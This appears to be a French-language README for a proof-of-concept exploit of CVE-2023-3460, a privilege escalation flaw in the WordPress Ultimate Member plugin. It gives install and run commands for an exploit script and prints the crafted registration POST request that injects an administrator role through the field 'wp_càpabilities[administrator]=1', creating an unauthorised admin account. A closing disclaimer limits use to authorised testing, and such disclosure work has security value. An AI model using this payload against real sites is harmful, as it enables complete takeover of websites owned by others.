
Preuve de concept pour CVE-2023-3460, une vulnérabilité d'escalade de privilèges dans WordPress Ultimate Member. Crée un compte administrateur via une demande d'inscription modifiée. Pour tests autorisés uniquement.
Il s'agit d'un exploit proof-of-concept (PoC) pour CVE-2023-3460, une vulnérabilité critique dans le plugin WordPress Ultimate Member. Il permet à des utilisateurs non authentifiés d'élever leurs privilèges au niveau Administrateur en créant une demande d'inscription malveillante.
🔥 Impact : Compromission complète du site via la création d'un compte administrateur non autorisé.
requests libraryurllib3 librarybeautifulsoup4 libraryInstaller les prérequis :
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) depuis la page d'inscriptionwp_capabilities avec le rôle administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Ce script est fourni à des fins éducatives et de tests autorisés uniquement. L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique. Utilisez-le uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez l'autorisation de tester.